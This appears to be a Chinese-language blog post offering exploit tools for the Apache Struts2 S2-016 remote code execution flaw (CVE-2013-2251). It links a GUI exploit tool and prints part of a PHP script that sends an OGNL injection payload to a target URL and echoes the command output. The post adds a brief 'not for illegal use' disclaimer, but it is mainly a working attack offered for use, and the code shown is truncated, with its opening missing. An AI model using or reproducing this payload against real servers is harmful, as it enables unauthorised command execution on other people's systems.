Struts2 S2-16漏洞利用工具

昨天Struts漏洞大爆发，N多大站被爆出存在strtus2漏洞，百度，百合，京东等也在其中，本站也等一时间发布了strtus2漏洞的预警，具体文章请看
struts2最新s2-016代码执行漏洞 – CVE-2013-2251，当时小弟说了稍候公布利用EXP，现在就兑现承诺。

首先发一个GUI版的，是K8拉登哥哥写的，可以利用较老的struts2漏洞，如下图：

下载地址：

点我下载

2013-07-24已经更新为最新稳定版

个人感觉拉登哥的用起来不是很方便，自己也折腾了一个，PHP版的，写的比较垃圾，代码也是参考了bstaint大牛的，当然也有部分改进的地方，比如中文代码等，为防乱用，未集成Getshell功能，可作为管理员测试网站安全性之用，勿用于非法用途。

\'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}';
    $html = @file_get_contents($url);
    $html = iconv('utf-8', 'gbk//IGNORE', $html);
    $arr = explode('', $html);
    return trim($arr[1]) . "\n";
}
$result = command($url, $cmd);
echo $result;
?>

from www.waitalone.cn.thanks for it.